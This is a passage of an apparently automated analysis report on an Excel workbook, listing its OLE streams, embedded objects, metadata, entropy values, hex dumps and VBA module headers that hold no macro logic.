                                                            Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                            VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                            General
                                                            Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                            VBA File Name:ThisWorkbook.cls
                                                            Stream Size:985
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 77 e5 91 ae 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            VBA Code
                                                            Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                            Streams

                                                            Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                            General
                                                            Stream Path:\x1CompObj
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:114
                                                            Entropy:4.25248375192737
                                                            Base64 Encoded:True
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                            General
                                                            Stream Path:\x5DocumentSummaryInformation
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:244
                                                            Entropy:2.889430592781307
                                                            Base64 Encoded:False
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                            General
                                                            Stream Path:\x5SummaryInformation
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:200
                                                            Entropy:3.2503503175049815
                                                            Base64 Encoded:False
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . M . ] D . . . . . . . . .
                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                            Stream Path: MBD006EC260/\x1CompObj, File Type: data, Stream Size: 114
                                                            General
                                                            Stream Path:MBD006EC260/\x1CompObj
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:114
                                                            Entropy:4.25248375192737
                                                            Base64 Encoded:True
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Stream Path: MBD006EC260/\x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                            General
                                                            Stream Path:MBD006EC260/\x5DocumentSummaryInformation
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:244
                                                            Entropy:2.701136490257069
                                                            Base64 Encoded:False
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                                            Stream Path: MBD006EC260/\x5SummaryInformation, File Type: data, Stream Size: 220
                                                            General
                                                            Stream Path:MBD006EC260/\x5SummaryInformation
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:220
                                                            Entropy:3.372234242231489
                                                            Base64 Encoded:False
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
                                                            Stream Path: MBD006EC260/MBD0018D4CE/\x1Ole, File Type: data, Stream Size: 20
                                                            General
                                                            Stream Path:MBD006EC260/MBD0018D4CE/\x1Ole
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:20
                                                            Entropy:0.5689955935892812
                                                            Base64 Encoded:False
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                            Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Stream Path: MBD006EC260/MBD0018D4CE/\x3ObjInfo, File Type: data, Stream Size: 4
                                                            General
                                                            Stream Path:MBD006EC260/MBD0018D4CE/\x3ObjInfo
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:4
                                                            Entropy:0.8112781244591328
                                                            Base64 Encoded:False
                                                            Data ASCII:. . . .
                                                            Data Raw:00 00 03 00
                                                            Stream Path: MBD006EC260/MBD0018D4CE/Contents, File Type: Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c, Stream Size: 197671
                                                            General
                                                            Stream Path:MBD006EC260/MBD0018D4CE/Contents
                                                            CLSID:
                                                            File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                            Stream Size:197671
                                                            Entropy:6.989042939766534
                                                            Base64 Encoded:True
                                                            Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                            Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Stream Path: MBD006EC260/MBD0068D442/\x1CompObj, File Type: data, Stream Size: 114
                                                            General
                                                            Stream Path:MBD006EC260/MBD0068D442/\x1CompObj
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:114
                                                            Entropy:4.219515110876372
                                                            Base64 Encoded:False
                                                            Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Stream Path: MBD006EC260/MBD0068D442/Package, File Type: Microsoft Excel 2007+, Stream Size: 26243
                                                            General
                                                            Stream Path:MBD006EC260/MBD0068D442/Package
                                                            CLSID:
                                                            File Type:Microsoft Excel 2007+
                                                            Stream Size:26243
                                                            Entropy:7.635433729726103
                                                            Base64 Encoded:True
                                                            Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Stream Path: MBD006EC260/MBD007203CB/\x1CompObj, File Type: data, Stream Size: 114
                                                            General
                                                            Stream Path:MBD006EC260/MBD007203CB/\x1CompObj
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:114
                                                            Entropy:4.25248375192737
                                                            Base64 Encoded:True
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Stream Path: MBD006EC260/MBD007203CB/\x5DocumentSummaryInformation, File Type: data, Stream Size: 248
                                                            General
                                                            Stream Path:MBD006EC260/MBD007203CB/\x5DocumentSummaryInformation
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:248
                                                            Entropy:3.0523231150355867
                                                            Base64 Encoded:False
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00
                                                            Stream Path: MBD006EC260/MBD007203CB/\x5SummaryInformation, File Type: data, Stream Size: 256
                                                            General
                                                            Stream Path:MBD006EC260/MBD007203CB/\x5SummaryInformation
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:256
                                                            Entropy:4.086306928392587
                                                            Base64 Encoded:True
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c | E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00
                                                            Stream Path: MBD006EC260/MBD007203CB/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 134792
                                                            General
                                                            Stream Path:MBD006EC260/MBD007203CB/Workbook
                                                            CLSID:
                                                            File Type:Applesoft BASIC program data, first line number 16
                                                            Stream Size:134792
                                                            Entropy:7.974168320310173
                                                            Base64 Encoded:True
                                                            Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z i ^ . m . q l % . w " . x . Z q C b g i ' . h . . # . . . . . . . P . . . \\ . p . . 6 u ! l ( n y I T 5 W { L : 1 J . S . . . . 0 x . 3 . ` . X { ( / z 7 / . 8 x X g X # v . . [ d C y . . s . ] G 9 m . u . . . B . . . R a . . . . . . . = . . . L . . . O . . r 7 . v . . . " . . . . " _ K : . . . . . . . . . j # . . . . K . . . . . . . . = . . . " j ! ; . g . . @ . . . . . . . ^ " . . . 9 . . . . r . . . . . . . 1 . . . : . t . ? e . ) n S P x . b & 1
                                                            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5a 69 5e 2e a6 e0 6d 97 16 71 6c a3 ef b8 25 05 77 88 22 87 ec d8 b3 78 17 a4 5a 71 43 ad a8 c2 62 67 69 b8 d9 e2 27 83 c8 df b8 f6 68 1b 05 23 e1 00 02 00 b0 04 c1 00 02 00 ef 50 e2 00 00 00 5c 00 70 00 13 36 75 21 6c 28 6e bd 95 81 f4 c7 79 fa 49 54 35 99 57 f1 85 8d fb f3 e2 7b 4c b1 ea 3a
                                                            Stream Path: MBD006EC260/MBD007203CB/_VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 468
                                                            General
                                                            Stream Path:MBD006EC260/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
                                                            CLSID:
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Stream Size:468
                                                            Entropy:5.269289820125323
                                                            Base64 Encoded:True
                                                            Data ASCII:I D = " { 1 9 C 9 4 3 8 D - F 0 7 5 - 4 2 6 8 - 9 E 6 E - 7 B 8 A E 6 6 D 5 A 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C D C F 3 A 0 A C A D 2 C E D 2 C E D 2 C E D 2 C E " . . D P B = " 9 9 9 B 6 E 9 3 6 F 9
                                                            Data Raw:49 44 3d 22 7b 31 39 43 39 34 33 38 44 2d 46 30 37 35 2d 34 32 36 38 2d 39 45 36 45 2d 37 42 38 41 45 36 36 44 35 41 30 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                            Stream Path: MBD006EC260/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 83
                                                            General
                                                            Stream Path:MBD006EC260/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:83
                                                            Entropy:3.0672749060249043
                                                            Base64 Encoded:False
                                                            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . . .
                                                            Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 00 00
                                                            Stream Path: MBD006EC260/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2486
                                                            General
                                                            Stream Path:MBD006EC260/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:2486
                                                            Entropy:3.9244127831265385
                                                            Base64 Encoded:False
                                                            Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                            Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                            Stream Path: MBD006EC260/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 536
                                                            General
                                                            Stream Path:MBD006EC260/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:536
                                                            Entropy:6.330646364694152
                                                            Base64 Encoded:True
                                                            Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . C W ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
                                                            Data Raw:01 14 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 43 57 5d 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                            Stream Path: MBD006EC260/MBD00726B69/\x1CompObj, File Type: data, Stream Size: 114
                                                            General
                                                            Stream Path:MBD006EC260/MBD00726B69/\x1CompObj
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:114
                                                            Entropy:4.219515110876372
                                                            Base64 Encoded:False
                                                            Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Stream Path: MBD006EC260/MBD00726B69/Package, File Type: Microsoft Excel 2007+, Stream Size: 26242
                                                            General
                                                            Stream Path:MBD006EC260/MBD00726B69/Package
                                                            CLSID:
                                                            File Type:Microsoft Excel 2007+
                                                            Stream Size:26242
                                                            Entropy:7.635424485665502
                                                            Base64 Encoded:True
                                                            Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Stream Path: MBD006EC260/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 283872
                                                            General
                                                            Stream Path:MBD006EC260/Workbook
                                                            CLSID:
                                                            File Type:Applesoft BASIC program data, first line number 16
                                                            Stream Size:283872
                                                            Entropy:7.743278150467805
                                                            Base64 Encoded:True
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . H < l - 9 . . . . . . . X . @ . . . . . . . . . .
                                                            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                            Stream Path: MBD006EC261/\x1Ole, File Type: data, Stream Size: 484
                                                            General
                                                            Stream Path:MBD006EC261/\x1Ole
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:484
                                                            Entropy:5.012813414218539
                                                            Base64 Encoded:False
